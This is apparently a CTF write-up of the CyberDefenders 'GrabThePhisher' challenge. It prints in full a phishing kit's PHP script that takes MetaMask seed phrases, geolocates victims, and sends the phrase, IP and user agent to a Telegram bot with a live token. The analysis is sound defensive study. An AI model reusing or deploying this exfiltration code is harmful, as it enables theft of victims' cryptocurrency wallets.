Solution

Hi,

recently I have finished challenge grabthephisher on cyber defenders.org. Let's check how to solve those puzzles.

#1 Which wallet is used for asking the seed phrase?

WWW display 3 wallets:

I checked structure of web site directory. Only one directory contained suspicious PHP script:

c75-GrabThePhisher\pankewk\metamask\metamask.php

#2 What is the file name that has the code for the phishing kit?

Suspicious file contains script written in PHP to gather intelligence and data from user.

#3 In which language was the kit written?

Script is written in PHP language.

#4 What service does the kit use to retrieve the victim's machine information?

Code of the scritpt:

<?php

$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']); 
$array = json_decode($request);
$geo = $array->country->name_en;
$city = $array->city->name_en;
$date = date("m.d.Y"); //aaja


/*
 With love and respect to all the hustler out there,
 This is a small gift to my brothers,
 All the best with your luck,
 
 Regards, 
 j1j1b1s@m3r0
  
  */


    $message = "<b>Welcome 2 The Jungle </b> 
    
<b>Wallet:</b> Metamask
<b>Phrase:</b> <code>" . $_POST["data"] . "</code>
<b>IP:</b> " .$_SERVER['REMOTE_ADDR'] . " | " .$geo. " | " .$city. "
<b>User:</b> " . $_SERVER['HTTP_USER_AGENT'] . "";


sendTel($message);  
	
    function sendTel($message){
		$id = "5442785564"; 
        $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10"; 
		$filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
		file_get_contents($filename);
        $_POST["import-account__secret-phrase"]. $text = $_POST['data']."\n";;
        @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);	

    }
    
    
    ?>
    

Line 3 shows the phisher is using Sypex Geo service to gather intelligence

$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);